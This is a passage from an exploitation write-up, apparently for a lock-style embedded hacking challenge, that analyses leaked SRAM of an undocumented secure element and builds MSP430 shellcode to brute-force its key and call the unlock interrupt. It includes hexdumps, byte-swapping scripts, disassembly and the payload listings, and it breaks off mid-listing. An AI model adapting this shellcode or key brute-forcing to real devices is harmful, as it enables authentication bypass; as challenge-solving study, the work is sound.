00000030  43 a1 05 ce d2 93 e8 95  ee 45 43 81 94 39 27 4a  |C........EC..9'J|
00000040  e6 19 8b 05 11 f0 26 2b  ff c9 43 ca 91 7b 64 01  |......&+..C..{d.|
00000050  fc 07 2b 7c 42 3a 95 0e  4a c4 b9 65 bf 33 de bc  |..+|B:..J..e.3..|
00000060  1d cc bb 04 a2 78 4a b6  cd e2 ae 5e 43 cf 8c 95  |.....xJ....^C...|
00000070  a1 c8 36 96 34 48 bc 16  bd f8 93 b2 6c 3e d3 30  |..6.4H......l>.0|
00000080  7b 7a 92 7b 38 e4 51 90  53 01 7f e0 2c e9 77 4a  |{z.{8.Q.S...,.wJ|
00000090  c3 93 0c a6 49 5f 7f 22  12 56 39 2d f1 e3 5c 4e  |....I_.".V9-..\N|
000000a0  48 b5 35 e0 c7 07 b4 e2  39 70 a0 ab 77 62 ac 7c  |H.5.....9p..wb.||
000000b0  85 5f 06 fb 32 69 4b 1a  89 b5 a5 5a 7a b2 9f b3  |._..2iK....Zz...|
000000c0  91 73 7f fd c9 17 6f 93  89 12 3d b0 01 83 fb 75  |.s....o...=....u|
000000d0  2f fb 38 3f d4 31 14 d4  47 3f bd 70 89 25 dd e5  |/.8?.1..G?.p.%..|
000000e0  c8 4e bc fa f6 84 0c 1f  7f 21 c2 56 a3 ff b9 42  |.N.......!.V...B|
000000f0  0f d8 91 f2 d1 ed 86 96  ad 92 87 cb 6b c2 9e 88  |............k...|
00000100  2c aa 36 17 d4 54 eb 1b  d9 54 d6 e9 90 f8 73 0e  |,.6..T...T....s.|
00000110  6e f6 0c c3 5c 2e 29 7c  4f c5 5d 8d e7 ea fb 11  |n...\.)|O.].....|
00000120  b2 0f bc 59 5e f7 d9 bb  d9 7d b6 08 4a 92 25 66  |...Y^....}..J.%f|
00000130  71 39 18 1e eb 5d 69 60  a6 dc b0 fc aa 4b cf b5  |q9...]i`.....K..|
00000140  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00001000

Run 5:

00000000  05 c5 b9 41 d9 ee 0b 22  f4 70 e1 3e 71 72 00 2c  |...A...".p.>qr.,|
00000010  ad 47 ca 55 4a b7 d9 12  a6 74 6d 48 51 b0 de 32  |.G.UJ....tmHQ..2|
00000020  00 96 06 90 ee 2e 90 f0  bf 42 30 d7 c2 48 fc f0  |.........B0..H..|
00000030  85 00 19 b7 16 cc b2 77  51 ba 65 6a c9 b7 0a 2a  |.......wQ.ej...*|
00000040  8e c3 e5 81 60 77 de 7f  f4 dc a7 5f d7 d8 30 ad  |....`w....._..0.|
00000050  99 96 7c 4e ba c7 df 1f  0f b1 e5 14 cf 20 e2 3f  |..|N......... .?|
00000060  35 27 07 6c 0d 77 6b dc  95 59 42 a8 aa 53 c2 61  |5'.l.wk..YB..S.a|
00000070  aa 57 63 3d 9c 91 61 5b  e4 f1 b8 67 3f af 5c 6e  |.Wc=..a[...g?.\n|
00000080  a7 34 49 51 5a 39 07 f0  1e a0 14 b3 d0 48 02 2c  |.4IQZ9.......H.,|
00000090  39 05 58 14 80 e0 a1 13  2a ea 5f 5c 2c 3c 5d fc  |9.X.....*._\,<].|
000000a0  6f 6e b7 51 06 00 07 99  03 9b 14 a8 f7 2a cd 75  |on.Q.........*.u|
000000b0  32 12 1c 5a 57 3d bc 59  fc af 70 a9 a4 b3 24 d6  |2..ZW=.Y..p...$.|
000000c0  06 99 79 9c 48 d3 7b e0  ff e8 d4 fe c6 cb 16 5d  |..y.H.{........]|
000000d0  4f d9 e5 29 8f 91 88 76  4b 0b a7 b5 5c 09 2a de  |O..)...vK...\.*.|
000000e0  ba cf 72 6a b7 d2 03 0c  cf e8 26 c3 a2 5d 28 9b  |..rj......&..](.|
000000f0  18 0c 56 82 44 fc eb 93  31 62 57 c1 66 0f bc e6  |..V.D...1bW.f...|
00000100  7f 48 66 d7 c9 23 98 12  b7 cd 73 ed e2 e7 6f f6  |.Hf..#....s...o.|
00000110  fe 71 c6 4d 08 72 83 81  20 74 d4 3c 84 2c ac b5  |.q.M.r.. t.<.,..|
00000120  59 e6 5c e4 72 54 26 e5  c0 51 1e 03 bb 2c 46 6b  |Y.\.rT&..Q...,Fk|
00000130  b1 9a ac ce 23 64 02 71  38 fa 75 ed 0f 39 77 8d  |....#d.q8.u..9w.|
00000140  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00001000

The size of the nonzero section seems to vary between runs (it may be either 0x40 or 0x140 bytes long). There is also no observable similarity between SRAM dumps when the length is the same.
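Both observations can be checked mechanically. The following sketch measures the populated length of a dump and counts how many byte positions agree between two dumps. The helper names are hypothetical, and the sample data is only the first row of Run 1 and Run 3 padded with zeros. Trailing zeros are stripped rather than stopping at the first zero byte, since Run 5 shows that zero bytes can occur inside the populated region; a dump whose final populated byte happens to be zero would be undercounted.

```python
SRAM_SIZE = 0x1000


def populated_length(dump: bytes) -> int:
    """Length of the dump once the trailing run of zero bytes is removed."""
    return len(dump.rstrip(b"\x00"))


def matching_positions(a: bytes, b: bytes) -> int:
    """Number of offsets in the shared populated region holding equal bytes."""
    shared = min(populated_length(a), populated_length(b))
    return sum(x == y for x, y in zip(a[:shared], b[:shared]))


def pad(row_hex: str) -> bytes:
    """Pad a short hex sample with zeros up to the size of SRAM."""
    row = bytes.fromhex(row_hex)
    return row + bytes(SRAM_SIZE - len(row))


# First rows of Run 1 and Run 3 from the hexdumps above.
run1 = pad("22 8b 2d 55 bc 29 a9 b4 1f fb b2 0f dd fe be 29")
run3 = pad("10 b7 d0 4b d8 66 a7 5b a4 d9 8f 80 22 c8 35 bb")

print(hex(populated_length(run1)), hex(populated_length(run3)))
print(matching_positions(run1, run3))
```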

If executable code exists in SRAM, it changes drastically between runs. The ISA for this processor requires all instructions to be 2, 4, or 6 bytes long. Attempting to disassemble the first two payloads from offsets 0, 2, 4, and 6 should produce at least one disassembly listing where the executable segment is aligned and intelligible. It is also necessary to account for endianness reversal. The following Python script prints hex strings of the SRAM contents in big and little-endian format.

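import binascii

# Read the raw SRAM dump produced by the previous script.
with open('output.bin', 'rb') as f:
    original = f.read()

# Swap each pair of adjacent bytes to reverse the endianness of every 16-bit word.
byteswapped = bytearray(len(original))
byteswapped[0::2] = original[1::2]
byteswapped[1::2] = original[0::2]

# Print the first 0x150 bytes of each variant as a hex string.
print(binascii.hexlify(original[0:0x150]).decode())
print(binascii.hexlify(byteswapped[0:0x150]).decode())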

Disassembling the resulting hex strings produces output resembling the following.

228b           sub	@r11, sr
2d55           add	@r5, r13
bc29           jnc	$+0x37a
a9b4 1ffb      bit	@r4, -0x4e1(r9)
b20f           invalid	#0x8
ddfe be29 fa54 and.b	0x29be(r14), 0x54fa(r13)
e9f0 855e      and.b	@pc, 0x5e85(r9)
3e05           rra	@r14+
fca8 45a8      dadd.b	@r8+, -0x57bb(r12)
c94e bc3f      mov.b	r14, 0x3fbc(r9)
dd29           jnc	$+0x3bc
599d 63dd      cmp.b	-0x229d(r13), r9
d99b 7e3e 645e cmp.b	0x3e7e(r11), 0x5e64(r9)
798a           sub.b	@r10+, r9
19b0 f564      bit	0x64f5(pc), r9
2c6a           addc	@r10, r12
f004 387d      swpb	#0x7d38
8c04           swpb	r12
a1f2 abda      and	#0x4, -0x2555(sp)
ef5d 0000      add.b	@r13, 0x0(r15)
0000           rrc	pc
0000           rrc	pc
0000           rrc	pc
0000           rrc	pc

Repeatedly disassembling after removing two, four, or six bytes from the beginning yields similarly unintelligible output. This pattern holds true for samples that are both 0x40 and 0x140 bytes long—regardless of endianness—and suggests an absence of executable code in SRAM.
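The repeated attempts described above can be generated in one pass. The following sketch produces the hex string for every combination of start offset and byte order; the function names are hypothetical, and the strings are meant to be pasted into whichever MSP430 disassembler is in use, since no disassembler is included here.

```python
def byteswap(data: bytes) -> bytes:
    """Swap each pair of adjacent bytes, dropping a trailing odd byte."""
    even = len(data) - (len(data) % 2)
    swapped = bytearray(data[:even])
    swapped[0::2] = data[1:even:2]
    swapped[1::2] = data[0:even:2]
    return bytes(swapped)


def disassembly_candidates(dump: bytes, offsets=(0, 2, 4, 6), length=0x150):
    """Yield (offset, byte order, hex string) for each variant to try."""
    for offset in offsets:
        window = dump[offset:offset + length]
        yield offset, "as-dumped", window.hex()
        yield offset, "byte-swapped", byteswap(window).hex()


# First row of Run 1, used here as a short stand-in for a full dump.
sample = bytes.fromhex("228b2d55bc29a9b41ffbb20fddfebe29")
candidates = list(disassembly_candidates(sample))
for offset, order, hex_string in candidates:
    print(offset, order, hex_string)
```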

Chip Identification

Based on the information acquired thus far, it is possible to conjecture about the "secure processor" class used by this system. Four pieces of circumstantial evidence stand out.

The manual command output refers to "secure memory" storing the key.
SRAM has a capacity of 4K.
There is no discernible executable code in SRAM.
The main MCU targets the highly embedded device market.

These observations support the hypothesis that the external device is a secure element. The rationale for this is as follows.

"Secure memory" has been used synonymously with "secure element" in other contexts. (Note: for example, see research by Olivier Hériveaux against the ATECC family of chips, i.e., ATECC508A or ATECC608B. The term "secure element" may be a somewhat inaccurate description, as the author notes that the ATECC508A may be erroneously marketed as a secure element when it does not have the relevant certifications to meet that standard for security. Regardless of whether the term "secure element" is accurate for describing the ATECC family of chips, this system resembles them because they have both GPIO pins and "secure memory.")
Secure elements are usually cheaper devices that have less storage than standard TPMs. 4KB is a minuscule quantity of memory for one of these; the usual range is 6KB-50KB. (Note: for further details, see timestamps 7:07 to 11:11 in this video.)
The lack of apparent code in SRAM suggests that it is used only for sensitive data storage. This functionality is consistent with WolfSSL's description of the "secure memory" typically offered by secure elements. (Note: a text search for "secure memory" in the WolfSSL page from earlier locates only one instance of the term. This phrase is found only in the section describing secure elements.)
It is unlikely that the hypothetical system architects would have opted for a more expensive chip for a highly embedded and ostensibly low-cost device.

Refining The Scope

The contents of SRAM appear to be data only, which implies that there is separate memory for executable code. Lacking a way to leak executable code from the secure element, achieving arbitrary code execution may be impossible. An authentication bypass vulnerability is the last contingency.

The lack of SRAM consistency confirms the random generation of the 16-byte key during each run. Unblocking interrupt 0x7F would require brute-forcing the calling convention for interrupt 0x41 and passing every possible key in SRAM.
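To give a sense of the size of that search, the sketch below enumerates every 16-byte window in the populated part of a dump. It assumes the key would be a contiguous run of bytes starting at any offset, which is a guess rather than something established above, and it does not attempt to pass anything to the interrupt. The function name and the placeholder dumps are hypothetical.

```python
KEY_LENGTH = 16  # key size stated above


def candidate_keys(dump: bytes, key_length: int = KEY_LENGTH) -> list[bytes]:
    """Every contiguous key-sized window in the populated part of a dump."""
    populated = dump.rstrip(b"\x00")   # ignore the zero-filled tail
    last_start = len(populated) - key_length
    return [populated[i:i + key_length] for i in range(last_start + 1)]


# Placeholder dumps with the two populated lengths observed above.
short_dump = bytes(range(1, 0x41)) + bytes(0x1000 - 0x40)
long_dump = bytes([0x01]) * 0x140 + bytes(0x1000 - 0x140)

print(len(candidate_keys(short_dump)))
print(len(candidate_keys(long_dump)))
```

Under that assumption, the candidate count is the populated length minus 15, so the search space is small once the calling convention is known.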

The Secure Element ABI

Dissecting The Calling Convention

Recall that interrupt 0x41 calculates the sha256 hash of SRAM and takes a key to unblock the unlock interrupt. The sha256_internal function wraps a call to interrupt 0x41, which could provide a clue as to what calling convention it expects when passing the key.

45b6 <sha256_internal>
45b6:  0d12           push	r13
45b8:  0e12           push	r14
45ba:  0f12           push	r15
45bc:  3012 4100      push	#0x41
45c0:  b012 5045      call	#0x4550 <INT>

The key is relatively large to be passed directly on the stack, so it is reasonable to assume that the secure element takes a pointer. Since sha256_internal passes the start offset and length in the words at SP+0x2 (the value of R15 pushed to the stack) and SP+0x4 (the value of R14 pushed to the stack) before the call to INT, neither word could store a pointer to the key.

      ┌────────────────────────────────────────┐
      │                 STACK                  │
┌──┐  ├──────┬─────────────────────────────────┤
│SP├─►│SP+0x0│0x41 (INTERRUPT NUMBER)          │
└──┘  ├──────┼─────────────────────────────────┤
      │SP+0x2│OFFSET                           │
      ├──────┼─────────────────────────────────┤
      │SP+0x4│LENGTH                           │
      ├──────┼─────────────────────────────────┤
      │SP+0x6│POINTER TO CHECKSUM RETURN BUFFER│
      ├──────┼─────────────────────────────────┤
      │SP+0x8│RETURN ADDRESS (MAIN)            │
      ├──────┼─────────────────────────────────┤
      │SP+0xa│???                              │
      ├──────┼─────────────────────────────────┤
      │SP+0xc│???                              │
      ├──────┼─────────────────────────────────┤
      │SP+0xe│???                              │
      └──────┴─────────────────────────────────┘

This stack layout implies that the word at SP+0x6 might serve as both a pointer to the location where the checksum is written and a pointer to the key. If this is the case, the checksum will overwrite the key after the interrupt call, and the implementation will pass a null key by default.

┌──────────────────────────────────────────────┐
│               CHECKSUM RETURN BUFFER         │
├──────┬───────────────────────────────────────┤
│BEFORE│0000 0000 0000 0000 0000 0000 0000 0000│
└──────┴──────────┬────────────────────────────┘
                  │
                  ▼
       ┌────────────────────┐
       │CALL sha256_internal│
       └──────────┬─────────┘
                  │
                  ▼
┌──────┬───────────────────────────────────────┐
│AFTER │XXXX XXXX XXXX XXXX XXXX XXXX XXXX XXXX│
└──────┴───────────────────────────────────────┘

This potential side effect (among others) will require the payload to have a custom clean-up routine between interrupt calls.

Alternatively, one of the other unused stack words below SP+0x6 might be a pointer to the key.

      ┌────────────────────────────────────────┐
      │                 STACK                  │
┌──┐  ├──────┬─────────────────────────────────┤
│SP├─►│SP+0x0│0x41 (INTERRUPT NUMBER)          │
└──┘  ├──────┼─────────────────────────────────┤
      │SP+0x2│OFFSET                           │
      ├──────┼─────────────────────────────────┤
      │SP+0x4│LENGTH                           │
      ├──────┼─────────────────────────────────┤
      │SP+0x6│POINTER TO CHECKSUM RETURN BUFFER│
      ├──────┼─────────────────────────────────┤
      │SP+0x8│RETURN ADDRESS (MAIN)            │
      ├──────┼─────────────────────────────────┤
      │SP+0xa│???                              │
      ├──────┼─────────────────────────────────┤
      │SP+0xc│???                              │
      ├──────┼─────────────────────────────────┤
      │SP+0xe│???                              │
      └──────┴─────────────────────────────────┘

This eventuality is unlikely in practice because SP+0x8 contains the return address for sha256_internal. If this word is a pointer to the key, that implies that sha256_internal is deliberately ignoring the correct calling convention and passing a chunk of instruction memory as a key. It is also unlikely that the three words after that are used as pointers because they overlap the checksum return buffer (which happens to be just afterward on the stack).

      ┌────────────────────────────────────────┐
      │                 STACK                  │
┌──┐  ├──────┬─────────────────────────────────┤
│SP├─►│SP+0x0│0x41 (INTERRUPT NUMBER)          │
└──┘  ├──────┼─────────────────────────────────┤
      │SP+0x2│OFFSET                           │
      ├──────┼─────────────────────────────────┤
      │SP+0x4│LENGTH                           │
      ├──────┼─────────────────────────────────┤
      │SP+0x6│POINTER TO CHECKSUM RETURN BUFFER├──┐
      ├──────┼─────────────────────────────────┤  │
      │SP+0x8│RETURN ADDRESS (MAIN)            │  │
      ├──────┼─────────────────────────────────┤  │
      │SP+0xa│CHECKSUM RETURN BUFFER + 0x0     │◄─┘
      ├──────┼─────────────────────────────────┤
      │SP+0xc│CHECKSUM RETURN BUFFER + 0x2     │
      ├──────┼─────────────────────────────────┤
      │SP+0xe│CHECKSUM RETURN BUFFER + 0x4     │
      └──────┴─────────────────────────────────┘

While it would be bizarre, this kind of breakage is not entirely out of the question.
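The SP-relative offsets in the diagrams above follow mechanically from the push order in sha256_internal. The following is a minimal Python sketch of that bookkeeping, not part of the original tooling; the helper name stack_layout and the labels are illustrative assumptions.

```python
# Hypothetical model of the stack just before `call #0x4550 <INT>` in sha256_internal.
WORD = 2  # MSP430 stack slots are 16 bits (2 bytes) wide


def stack_layout(pushed):
    """Map SP-relative byte offsets to labels; the last item pushed sits at SP+0x0."""
    return {i * WORD: label for i, label in enumerate(reversed(pushed))}


pushed_in_order = [
    "return address (main)",    # pushed by the call into sha256_internal
    "r13",                      # push r13
    "r14",                      # push r14
    "r15",                      # push r15
    "0x41 (interrupt number)",  # push #0x41
]

layout = stack_layout(pushed_in_order)
for offset, label in layout.items():
    print(f"SP+{offset:#x}: {label}")
```

Under this model, the value of R13 lands at SP+0x6 and the return address at SP+0x8, which matches the layout shown in the diagrams.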

Search Space

The key is at an unknown offset, and the contents of SRAM vary in length between runs. There are 48 or 304 possible offsets where the key could start, depending on the size of the nonzero data in SRAM for the current run.

>>> 0x40-16
48
>>> 0x140-16
304

It is unclear whether the contents of SRAM are byte or word addressed, which means that the secure element could parse the key as sixteen bytes or eight little-endian words. This possibility requires reversing the endianness for every two-byte word in the leaked data.

>>> (0x40-16)*2
96
>>> (0x140-16)*2
608

Accounting for both the endianness and the exact offset being unknown, there are 608 possible keys on the high end.
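The search space can also be enumerated directly. The sketch below is an illustration only: the names swap_words and key_candidates are hypothetical, and the input is placeholder data rather than a real SRAM dump. It slides a 16-byte window over the leaked bytes in both byte orders.

```python
KEY_LEN = 16  # the console output states that the key is 16 bytes long


def swap_words(data: bytes) -> bytes:
    """Swap the two bytes of every 16-bit word; a trailing odd byte is kept as-is."""
    out = bytearray(data)
    for i in range(0, len(out) - 1, 2):
        out[i], out[i + 1] = out[i + 1], out[i]
    return bytes(out)


def key_candidates(sram: bytes):
    """Yield (byte_order, offset, candidate) for every 16-byte window in both byte orders."""
    for order, view in (("as-leaked", sram), ("word-swapped", swap_words(sram))):
        for offset in range(len(view) - KEY_LEN + 1):
            yield order, offset, view[offset:offset + KEY_LEN]


leak = bytes(range(0x40))  # placeholder data, not a real SRAM dump
count = sum(1 for _ in key_candidates(leak))
print(count)
```

This sketch also counts the window that ends on the final byte, so it reports one more candidate per byte order than the estimate above (98 rather than 96 for 0x40 bytes of data). The difference does not change the order of magnitude of the search.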

Approach To Automation

Emulators exist for this system that might allow for easier integration with higher-level tooling (e.g., Python), but none of these support the new undocumented interrupts, including 0x40 and 0x41.

There are two options.

Patch instructions into memory, wrap the provided debugger with a higher-level language or framework, expose an API, and write custom code to make calls to it.
Write all the code in assembly and load it into memory as a debug payload.

The official debugger has a bug where it will freeze when single-stepped too quickly, so the latter approach is preferable. The former option also runs slower and will still require some artisan assembly.

Key Endianness

The first task is modifying the rainbow table Python script to produce a second output that swaps the endianness for every word. Appending extra logic to the end of the existing code accomplishes this.

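# Build a second copy of the output with the bytes of every 16-bit word swapped.
output_little_endian = b''
for i in range(0, len(output), 2):
    output_little_endian += (output[i+1]).to_bytes(1, "big")
    output_little_endian += (output[i]).to_bytes(1, "big")

# Write the swapped copy (not the original output) to its own file.
with open("output_little_endian.bin", "wb") as f:
    f.write(output_little_endian)

print(binascii.hexlify(output_little_endian).decode())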

Second Stage Payload

Data Section Tweaks

Changes to the data section are as follows.

3040 0080 ffff 0003
ffaf 00b5 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000

Because there are usually no more than 0x140 bytes of nonzero data, the payload only leaks the first 0x300 bytes of secure memory.

3040 0080 ffff 0003
ffaf 00b5 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000

Extending The Shellcode

There must be a mechanism to read the leaked contents of SRAM back into MCU memory after the external rainbow table lookups are complete.

      ┌─────────┬─────────────────────┐
      │3e40 00f0│mov  #0xf000, r14    │
      ├─────────┼─────────────────────┤
      │3f40 0090│mov  #0x9000, r15    │
┌──┐  ├─────────┼─────────────────────┤
│PC├─►│b012 6845│call #0x4568 <getsn> │
└──┘  └─────────┴─────────────────────┘

                        ┌─────────────────────┐
                        │      EXTERNAL       │
                        ├─────────────────────┤
                        │[RECOVERED SRAM DATA]│
                        └─────────┬───────────┘
                                  │
                                  │ READ
                                  │ INTO
                                  ▼
      ┌────────────────┬────────┬────┬───┬────┐
      │                │CONTENTS│0000│...│0000│
      │CANONICAL BUFFER├────────┼────┼───┼────┤
      │                │ADDRESS │9000│...│9300│
      └────────────────┴────────┴────┴───┴────┘

This getsn call will read up to 0xF000 bytes from user input and write them to address 0x9000 in the main MCU memory. (The buffer size for the input is arbitrarily large; this is convenient but not strictly necessary.) This buffer will be the canonical, unchanging copy of the SRAM data.

Following this, the shellcode copies the first 0x1000 bytes of the input buffer to address 0xB000 via a call to memcpy.

      ┌─────────┬─────────────────────┐
      │3e40 00f0│mov  #0xf000, r14    │
      ├─────────┼─────────────────────┤
      │3f40 0090│mov  #0x9000, r15    │
      ├─────────┼─────────────────────┤
      │b012 6845│call #0x4568 <getsn> │
      ├─────────┼─────────────────────┤
      │3d40 0010│mov  #0x1000, r13    │
      ├─────────┼─────────────────────┤
      │3e40 0090│mov  #0x9000, r14    │
      ├─────────┼─────────────────────┤
      │3f40 00b0│mov  #0xb000, r15    │
┌──┐  ├─────────┼─────────────────────┤
│PC├─►│b012 a445│call #0x45a4 <memcpy>│
└──┘  └─────────┴─────────────────────┘

                                 ┌──────────────┐
                                 │              │
      ┌────────────────┬────────┬┴───┬───┬────┐ │
      │                │CONTENTS│XXXX│...│0000│ │
      │CANONICAL BUFFER├────────┼────┼───┼────┤ │
      │                │ADDRESS │9000│...│9300│ │
      └────────────────┴────────┴────┴───┴────┘ │
                                                │
                              ┌─────────────────┘
                              ▼
      ┌─────────────┬────────┬────┬───┬────┐
      │             │CONTENTS│XXXX│...│0000│
      │SHADOW BUFFER├────────┼────┼───┼────┤
      │             │ADDRESS │B000│...│B300│
      └─────────────┴────────┴────┴───┴────┘

This code is part of the loop that repeatedly calls interrupt 0x41. The memory at address 0xB000 shadows address 0x9000. The shellcode will overwrite it with unchanging data from the canonical buffer after each iteration, ensuring that unknown side effects do not corrupt it after the return from the interrupt callgate.

Next is the counter for the current position in the shadow buffer.

       ┌─────────┬─────────────────────┐
       │3e40 00f0│mov  #0xf000, r14    │
       ├─────────┼─────────────────────┤
       │3f40 0090│mov  #0x9000, r15    │
       ├─────────┼─────────────────────┤
       │b012 6845│call #0x4568 <getsn> │
       ├─────────┼─────────────────────┤
       │3d40 0010│mov  #0x1000, r13    │
       ├─────────┼─────────────────────┤
       │3e40 0090│mov  #0x9000, r14    │
       ├─────────┼─────────────────────┤
       │3f40 00b0│mov  #0xb000, r15    │
       ├─────────┼─────────────────────┤
       │b012 a445│call #0x45a4 <memcpy>│
┌───┐  ├─────────┼─────────────────────┤
│PC¹├─►│1d42 0a80│mov  &0x800a, r13    │
├───┤  ├─────────┼─────────────────────┤
│PC²├─►│1d53     │inc  r13             │
├───┤  ├─────────┼─────────────────────┤
│PC³├─►│824d 0a80│mov  r13, &0x800a    │
└───┘  └─────────┴─────────────────────┘

       ┌──────┐
       │      │
       │ DATA │
       │      │
       ├──────┤
       │ 3040 │
       ├──────┤
       │ 0080 │
       ├──────┤
       │ FFFF │
       ├──────┤      ┌────┐           ┌────┐
       │ 0003 │      │R13:│           │R13:│
       ├──────┤ LOAD¹├────┤ INCREMENT²├────┤
     ┌►│ FFAF ├─────►│AFFF├──────────►│B000│
     │ ├──────┤      └────┘           └─┬──┘
     │ │ 00b5 │                         │
     │ ├──────┤                         │
     │ │ .... │                         │
     │ ├──────┤                         │
     │ │ .... │                         │
     │ └──────┘                         │
     │               STORE³             │
     └──────────────────────────────────┘

The fifth word in the data section stores this variable.

3040 0080 ffff 0003
ffaf 00b5 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000

The value of 0xAFFF will be incremented by 0x1, making it 0xB000 (the beginning of the shadow buffer). This value is the start offset where the current key candidate begins. It will be incremented by one with each iteration of the loop.

current_offset = 1

  ┌──────┐
  │      │
  │ DATA │
  │      │
  ├──────┤
  │ 3040 │
  ├──────┤
  │ 0080 │
  ├──────┤
  │ FFFF │
  ├──────┤      ┌────┐           ┌────┐
  │ 0003 │      │R13:│           │R13:│
  ├──────┤ LOAD¹├────┤ INCREMENT²├────┤
┌►│ 00B0 ├─────►│B000├──────────►│B001│
│ ├──────┤      └────┘           └─┬──┘
│ │ 00b5 │                         │
│ ├──────┤                         │
│ │ .... │                         │
│ ├──────┤                         │
│ │ .... │                         │
│ └──────┘                         │
│               STORE³             │
└──────────────────────────────────┘

current_offset = 2

  ┌──────┐
  │      │
  │ DATA │
  │      │
  ├──────┤
  │ 3040 │
  ├──────┤
  │ 0080 │
  ├──────┤
  │ FFFF │
  ├──────┤      ┌────┐           ┌────┐
  │ 0003 │      │R13:│           │R13:│
  ├──────┤ LOAD¹├────┤ INCREMENT²├────┤
┌►│ 01B0 ├─────►│B001├──────────►│B002│
│ ├──────┤      └────┘           └─┬──┘
│ │ 00b5 │                         │
│ ├──────┤                         │
│ │ .... │                         │
│ ├──────┤                         │
│ │ .... │                         │
│ └──────┘                         │
│               STORE³             │
└──────────────────────────────────┘

The payload passes the parameters for the 0x41 interrupt as follows.

      ┌─────────┬─────────────────────┐
      │3e40 00f0│mov  #0xf000, r14    │
      ├─────────┼─────────────────────┤
      │3f40 0090│mov  #0x9000, r15    │
      ├─────────┼─────────────────────┤
      │b012 6845│call #0x4568 <getsn> │
      ├─────────┼─────────────────────┤
      │3d40 0010│mov  #0x1000, r13    │
      ├─────────┼─────────────────────┤
      │3e40 0090│mov  #0x9000, r14    │
      ├─────────┼─────────────────────┤
      │3f40 00b0│mov  #0xb000, r15    │
      ├─────────┼─────────────────────┤
      │b012 a445│call #0x45a4 <memcpy>│
      ├─────────┼─────────────────────┤
      │1d42 0a80│mov  &0x800a, r13    │
      ├─────────┼─────────────────────┤
      │1d53     │inc  r13             │
      ├─────────┼─────────────────────┤
      │824d 0a80│mov  r13, &0x800a    │
      ├─────────┼─────────────────────┤
      │0d12     │push r13             │
      ├─────────┼─────────────────────┤
      │0d12     │push r13             │
      ├─────────┼─────────────────────┤
      │0d12     │push r13             │
      ├─────────┼─────────────────────┤
      │0d12     │push r13             │
      ├─────────┼─────────────────────┤
      │2312     │push #0x2            │
      ├─────────┼─────────────────────┤
      │2312     │push #0x2            │
      ├─────────┼─────────────────────┤
      │3012 4100│push #0x41           │
┌──┐  ├─────────┼─────────────────────┤
│PC├─►│b012 5045│call #0x4550 <INT>   │
└──┘  ├─────────┼─────────────────────┤
      │3150 0e00│add  #0xe, sp        │
      └─────────┴─────────────────────┘

      ┌──────────────────────────────────────────────────┐
      │                 STACK                            │
┌──┐  ├──────┬───────────────────────────────────────────┤
│SP├─►│SP+0x0│0x41 (INTERRUPT NUMBER)                    │
└──┘  ├──────┼───────────────────────────────────────────┤
      │SP+0x2│0x2 (OFFSET)                               │
      ├──────┼───────────────────────────────────────────┤
      │SP+0x4│0x2 (LENGTH)                               │
      ├──────┼───────────────────────────────────────────┤
      │SP+0x6│POINTER TO SHADOW BUFFER + CURRENT_OFFSET  │
      ├──────┼───────────────────────────────────────────┤
      │SP+0x8│POINTER TO SHADOW BUFFER + CURRENT_OFFSET  │
      ├──────┼───────────────────────────────────────────┤
      │SP+0xa│POINTER TO SHADOW BUFFER + CURRENT_OFFSET  │
      ├──────┼───────────────────────────────────────────┤
      │SP+0xc│POINTER TO SHADOW BUFFER + CURRENT_OFFSET  │
      └──────┴───────────────────────────────────────────┘

It is unclear which stack word should contain the pointer to the key, but it obviously cannot replace the offset or length because that would break the hashing logic. Valid dummy values (0x2) serve as surrogates for these two words. The four words after that contain the pointer to the current offset in the shadow buffer. The call should succeed if interrupt 0x41 interprets one of these stack words as a key pointer.

The payload needs some way to verify whether the secure element accepted the key and unblocked the unlock interrupt, so it simply attempts to call the unlock interrupt after each candidate.

      ┌─────────┬─────────────────────┐
      │3e40 00f0│mov  #0xf000, r14    │
      ├─────────┼─────────────────────┤
      │3f40 0090│mov  #0x9000, r15    │
      ├─────────┼─────────────────────┤
      │b012 6845│call #0x4568 <getsn> │
      ├─────────┼─────────────────────┤
      │3d40 0010│mov  #0x1000, r13    │
      ├─────────┼─────────────────────┤
      │3e40 0090│mov  #0x9000, r14    │
      ├─────────┼─────────────────────┤
      │3f40 00b0│mov  #0xb000, r15    │
      ├─────────┼─────────────────────┤
      │b012 a445│call #0x45a4 <memcpy>│
      ├─────────┼─────────────────────┤
      │1d42 0a80│mov  &0x800a, r13    │
      ├─────────┼─────────────────────┤
      │1d53     │inc  r13             │
      ├─────────┼─────────────────────┤
      │824d 0a80│mov  r13, &0x800a    │
      ├─────────┼─────────────────────┤
      │0d12     │push r13             │
      ├─────────┼─────────────────────┤
      │0d12     │push r13             │
      ├─────────┼─────────────────────┤
      │0d12     │push r13             │
      ├─────────┼─────────────────────┤
      │0d12     │push r13             │
      ├─────────┼─────────────────────┤
      │2312     │push #0x2            │
      ├─────────┼─────────────────────┤
      │2312     │push #0x2            │
      ├─────────┼─────────────────────┤
      │3012 4100│push #0x41           │
      ├─────────┼─────────────────────┤
      │b012 5045│call #0x4550 <INT>   │
      ├─────────┼─────────────────────┤
      │3150 0e00│add  #0xe, sp        │
      ├─────────┼─────────────────────┤
      │3240 00ff│mov  #0xff00, sr     │
┌──┐  ├─────────┼─────────────────────┤
│PC├─►│b012 1000│call #0x10           │
└──┘  └─────────┴─────────────────────┘

The successful unlock status message should appear if the current key candidate authenticates to the secure element.

Lastly, if the unlock interrupt call does not succeed, the last defined word in the data section is compared to the current offset in the shadow buffer. If the two are equal, the code deliberately jumps into null memory and crashes, signaling that execution has ended without finding a valid key.


       ┌─────────┬─────────────────────┐
       │3e40 00f0│mov  #0xf000, r14    │
       ├─────────┼─────────────────────┤
       │3f40 0090│mov  #0x9000, r15    │
       ├─────────┼─────────────────────┤
       │b012 6845│call #0x4568 <getsn> │
       ├─────────┼─────────────────────┤
       │3d40 0010│mov  #0x1000, r13    │
       ├─────────┼─────────────────────┤
       │3e40 0090│mov  #0x9000, r14    │
       ├─────────┼─────────────────────┤
       │3f40 00b0│mov  #0xb000, r15    │
       ├─────────┼─────────────────────┤
       │b012 a445│call #0x45a4 <memcpy>│
       ├─────────┼─────────────────────┤
       │1d42 0a80│mov  &0x800a, r13    │
       ├─────────┼─────────────────────┤
